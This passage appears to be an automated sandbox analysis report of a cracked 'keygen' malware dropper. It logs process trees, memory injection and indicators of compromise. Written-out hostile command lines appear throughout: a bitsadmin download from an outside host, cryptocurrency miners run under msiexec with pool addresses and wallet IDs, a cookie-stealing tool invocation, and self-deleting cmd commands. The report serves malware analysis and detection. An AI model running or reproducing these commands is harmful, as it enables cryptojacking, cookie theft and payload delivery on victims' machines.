Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3940	ultramediaburner.tmp

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
1564	xiuhuali.exe
1564	xiuhuali.exe
4568	MicrosoftEdge.exe
4604	MicrosoftEdgeCP.exe
5676	google-game.exe
5676	google-game.exe
4604	MicrosoftEdgeCP.exe
6048	MicrosoftEdge.exe
5892	MicrosoftEdgeCP.exe
2556	MicrosoftEdgeCP.exe
2556	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2756	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3952 wrote to memory of 1564	3952	keygen-step-4.exe	75
PID 3952 wrote to memory of 1564	3952	keygen-step-4.exe	75
PID 3952 wrote to memory of 1564	3952	keygen-step-4.exe	75
PID 1564 wrote to memory of 2824	1564	xiuhuali.exe	77
PID 1564 wrote to memory of 2824	1564	xiuhuali.exe	77
PID 1564 wrote to memory of 2824	1564	xiuhuali.exe	77
PID 3952 wrote to memory of 3532	3952	keygen-step-4.exe	78
PID 3952 wrote to memory of 3532	3952	keygen-step-4.exe	78
PID 2824 wrote to memory of 500	2824	rundll32.exe	70
PID 2824 wrote to memory of 2672	2824	rundll32.exe	18
PID 500 wrote to memory of 192	500	svchost.exe	79
PID 500 wrote to memory of 192	500	svchost.exe	79
PID 500 wrote to memory of 192	500	svchost.exe	79
PID 2824 wrote to memory of 344	2824	rundll32.exe	53
PID 2824 wrote to memory of 2488	2824	rundll32.exe	20
PID 2824 wrote to memory of 2468	2824	rundll32.exe	21
PID 2824 wrote to memory of 1080	2824	rundll32.exe	47
PID 2824 wrote to memory of 936	2824	rundll32.exe	50
PID 2824 wrote to memory of 1412	2824	rundll32.exe	39
PID 2824 wrote to memory of 1904	2824	rundll32.exe	30
PID 2824 wrote to memory of 1268	2824	rundll32.exe	43
PID 2824 wrote to memory of 1356	2824	rundll32.exe	40
PID 2824 wrote to memory of 2776	2824	rundll32.exe	14
PID 2824 wrote to memory of 2796	2824	rundll32.exe	13
PID 3952 wrote to memory of 1128	3952	keygen-step-4.exe	82
PID 3952 wrote to memory of 1128	3952	keygen-step-4.exe	82
PID 3952 wrote to memory of 1128	3952	keygen-step-4.exe	82
PID 1128 wrote to memory of 1388	1128	Install.exe	83
PID 1128 wrote to memory of 1388	1128	Install.exe	83
PID 1128 wrote to memory of 1388	1128	Install.exe	83
PID 1388 wrote to memory of 1468	1388	Install.tmp	85
PID 1388 wrote to memory of 1468	1388	Install.tmp	85
PID 1468 wrote to memory of 1672	1468	Ultra.exe	87
PID 1468 wrote to memory of 1672	1468	Ultra.exe	87
PID 1468 wrote to memory of 1672	1468	Ultra.exe	87
PID 1672 wrote to memory of 3940	1672	ultramediaburner.exe	88
PID 1672 wrote to memory of 3940	1672	ultramediaburner.exe	88
PID 1672 wrote to memory of 3940	1672	ultramediaburner.exe	88
PID 3940 wrote to memory of 1916	3940	ultramediaburner.tmp	89
PID 3940 wrote to memory of 1916	3940	ultramediaburner.tmp	89
PID 1468 wrote to memory of 2720	1468	Ultra.exe	90
PID 1468 wrote to memory of 2720	1468	Ultra.exe	90
PID 1468 wrote to memory of 1776	1468	Ultra.exe	91
PID 1468 wrote to memory of 1776	1468	Ultra.exe	91
PID 3952 wrote to memory of 4188	3952	keygen-step-4.exe	92
PID 3952 wrote to memory of 4188	3952	keygen-step-4.exe	92
PID 3952 wrote to memory of 4188	3952	keygen-step-4.exe	92
PID 1776 wrote to memory of 4992	1776	Tevaesurama.exe	96
PID 1776 wrote to memory of 4992	1776	Tevaesurama.exe	96
PID 4992 wrote to memory of 2772	4992	cmd.exe	98
PID 4992 wrote to memory of 2772	4992	cmd.exe	98
PID 4992 wrote to memory of 2772	4992	cmd.exe	98
PID 4188 wrote to memory of 4768	4188	filee.exe	100
PID 4188 wrote to memory of 4768	4188	filee.exe	100
PID 4188 wrote to memory of 4768	4188	filee.exe	100
PID 4188 wrote to memory of 4984	4188	filee.exe	101
PID 4188 wrote to memory of 4984	4188	filee.exe	101
PID 4984 wrote to memory of 5496	4984	7863.tmp.exe	104
PID 4984 wrote to memory of 5496	4984	7863.tmp.exe	104
PID 1776 wrote to memory of 5504	1776	Tevaesurama.exe	103
PID 1776 wrote to memory of 5504	1776	Tevaesurama.exe	103
PID 4984 wrote to memory of 5496	4984	7863.tmp.exe	104
PID 4984 wrote to memory of 5496	4984	7863.tmp.exe	104
PID 4984 wrote to memory of 5496	4984	7863.tmp.exe	104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1080

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3952
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2824
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3532
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Users\Admin\AppData\Local\Temp\is-IPRCF.tmp\Install.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-IPRCF.tmp\Install.tmp" /SL5="$6004A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\is-UP3VH.tmp\Ultra.exe
      "C:\Users\Admin\AppData\Local\Temp\is-UP3VH.tmp\Ultra.exe" /S /UID=burnerch1
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Drops file in Program Files directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1468
    - - C:\Program Files\Windows NT\PCNUGQHGUQ\ultramediaburner.exe
        
        "C:\Program Files\Windows NT\PCNUGQHGUQ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1672
      - C:\Users\Admin\AppData\Local\Temp\is-U1P07.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-U1P07.tmp\ultramediaburner.tmp" /SL5="$801D6,281924,62464,C:\Program Files\Windows NT\PCNUGQHGUQ\ultramediaburner.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        7⤵
        Executes dropped EXE
        
        PID:1916
    - - C:\Users\Admin\AppData\Local\Temp\46-ff2ea-8ed-b5cab-ad328f7a6e419\Xobaepojedu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\46-ff2ea-8ed-b5cab-ad328f7a6e419\Xobaepojedu.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2720
    - - C:\Users\Admin\AppData\Local\Temp\f1-5a0a3-5b1-ce7b7-ccfbeeff22048\Tevaesurama.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f1-5a0a3-5b1-ce7b7-ccfbeeff22048\Tevaesurama.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1776
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j1opknwj.5fu\instEU.exe & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\j1opknwj.5fu\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\j1opknwj.5fu\instEU.exe
        7⤵
        Executes dropped EXE
        
        PID:2772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qirupis5.lrp\google-game.exe & exit
        6⤵
        
        PID:5504
        
        C:\Users\Admin\AppData\Local\Temp\qirupis5.lrp\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\qirupis5.lrp\google-game.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5676
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        8⤵
        Loads dropped DLL
        
        PID:5832
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dgyhphm5.l4g\md1_1eaf.exe & exit
        6⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\dgyhphm5.l4g\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\dgyhphm5.l4g\md1_1eaf.exe
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        
        PID:184
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iszycv4s.t3u\y1.exe & exit
        6⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\iszycv4s.t3u\y1.exe
        
        C:\Users\Admin\AppData\Local\Temp\iszycv4s.t3u\y1.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5352
        
        C:\Users\Admin\AppData\Local\Temp\xKJtuuOGi2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xKJtuuOGi2.exe"
        8⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:4988
        
        C:\Users\Admin\AppData\Roaming\1619279953680.exe
        
        "C:\Users\Admin\AppData\Roaming\1619279953680.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619279953680.txt"
        9⤵
        
        PID:5608
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\xKJtuuOGi2.exe"
        9⤵
        
        PID:6132
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        10⤵
        Runs ping.exe
        
        PID:6104
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\iszycv4s.t3u\y1.exe"
        8⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /T 10 /NOBREAK
        9⤵
        Delays execution with timeout.exe
        
        PID:5316
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iugznzlk.34t\askinstall39.exe & exit
        6⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\iugznzlk.34t\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\iugznzlk.34t\askinstall39.exe
        7⤵
        Executes dropped EXE
        
        PID:5344
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:2104
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lsv14xpb.zr1\inst.exe & exit
        6⤵
        
        PID:4900
        
        C:\Users\Admin\AppData\Local\Temp\lsv14xpb.zr1\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\lsv14xpb.zr1\inst.exe
        7⤵
        Executes dropped EXE
        
        PID:4636
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1344xdsf.54m\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:4824
        
        C:\Users\Admin\AppData\Local\Temp\1344xdsf.54m\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\1344xdsf.54m\SunLabsPlayer.exe /S
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:5592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:2084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        Checks for any installed AV software in registry
        
        PID:3992
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:4748
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4068
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA409NQkORsHBcld -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:4628
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pahDvPhHtnMxgPUG -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        Executes dropped EXE
        
        PID:5832
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:3508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        Blocklisted process makes network request
        
        PID:5012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4536
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\vEzcjRDlMgL\vEzcjRDlMgL.dll" vEzcjRDlMgL
        8⤵
        
        PID:3928
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\vEzcjRDlMgL\vEzcjRDlMgL.dll" vEzcjRDlMgL
        9⤵
        Loads dropped DLL
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:1716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:5288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:4932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxD8E3.tmp\tempfile.ps1"
        8⤵
        
        PID:2928
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:3928
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fot35b44.zg0\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:5220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zouvlnoy.4lt\toolspab1.exe & exit
        6⤵
        
        PID:5480
        
        C:\Users\Admin\AppData\Local\Temp\zouvlnoy.4lt\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\zouvlnoy.4lt\toolspab1.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5628
        
        C:\Users\Admin\AppData\Local\Temp\zouvlnoy.4lt\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\zouvlnoy.4lt\toolspab1.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:1172
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qocbgkws.pqb\c7ae36fa.exe & exit
        6⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\qocbgkws.pqb\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\qocbgkws.pqb\c7ae36fa.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:4796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yyyok5xy.5ct\app.exe /8-2222 & exit
        6⤵
        
        PID:5368
        
        C:\Users\Admin\AppData\Local\Temp\yyyok5xy.5ct\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\yyyok5xy.5ct\app.exe /8-2222
        7⤵
        Executes dropped EXE
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\yyyok5xy.5ct\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\yyyok5xy.5ct\app.exe" /8-2222
        8⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:5192
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Users\Admin\AppData\Roaming\75F1.tmp.exe
    "C:\Users\Admin\AppData\Roaming\75F1.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:4768
  - - C:\Users\Admin\AppData\Roaming\75F1.tmp.exe
      "C:\Users\Admin\AppData\Roaming\75F1.tmp.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:5804
- - C:\Users\Admin\AppData\Roaming\7863.tmp.exe
    "C:\Users\Admin\AppData\Roaming\7863.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4984
  - - C:\Windows\system32\msiexec.exe
      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w16366@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
      4⤵
      PID:5496
  - - C:\Windows\system32\msiexec.exe
      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w112 --cpu-max-threads-hint 50 -r 9999
      4⤵
      Blocklisted process makes network request
      PID:5692
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
    3⤵
    PID:5312
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5476
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:4940
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4668
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:4120
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:4944
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:5672
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:3432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:936
- C:\Users\Admin\AppData\Roaming\dsdtsbw
  C:\Users\Admin\AppData\Roaming\dsdtsbw
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6100
- - C:\Users\Admin\AppData\Roaming\dsdtsbw
    C:\Users\Admin\AppData\Roaming\dsdtsbw
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5744
- C:\Users\Admin\AppData\Roaming\tvdtsbw
  C:\Users\Admin\AppData\Roaming\tvdtsbw
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:3512
- C:\Users\Admin\AppData\Roaming\dsdtsbw
  C:\Users\Admin\AppData\Roaming\dsdtsbw
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5312
- - C:\Users\Admin\AppData\Roaming\dsdtsbw
    C:\Users\Admin\AppData\Roaming\dsdtsbw
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:5820
- C:\Users\Admin\AppData\Roaming\tvdtsbw
  C:\Users\Admin\AppData\Roaming\tvdtsbw
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:2288
- C:\Users\Admin\AppData\Roaming\dsdtsbw
  C:\Users\Admin\AppData\Roaming\dsdtsbw
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1648
